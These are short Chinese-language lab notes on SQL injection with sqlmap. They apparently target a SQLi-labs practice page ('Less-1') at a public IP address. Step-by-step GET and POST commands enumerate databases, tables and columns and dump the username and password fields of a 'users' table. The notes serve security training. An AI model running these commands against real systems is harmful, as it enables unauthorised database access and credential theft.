拖数据库(用的第一种方法指定url)
sqlmap -u http://47.108.235.197:99/labs/Less-1/?id=1 --dbs
拖blog 数据库的表
sqlmap -u "http://47.108.235.197:99/labs/Less-1/?id=1" -D "blog" --tables
拖users表的字段
sqlmap -u "http://47.108.235.197:99/labs/Less-1/?id=1" -D "blog" -T "users" --columns
拖出指定字段数据
sqlmap -u "http://47.108.235.197:99/labs/Less-1/?id=1" -D "blog" -T "users" -C "username,password" --dump
二、post 方式注入(方式二)
拖库
把请求参数都放进winidows 文件夹中,再复制进kali ,kali 的命令为sqlmap -r 文件路径
拖数据库 sqlmap -r /home/p-0p-0/post3.txt --dbs
拖表名
sqlmap -r /home/p-0p-0/post3.txt -D "blog" --tables
拖字段
sqlmap -r /home/p-0p-0/post3.txt -D "blog" -T "users" --columns
拖数据
sqlmap -r /home/p-0p-0/post3.txt -D "blog" -T "users" -C "username,password" --dump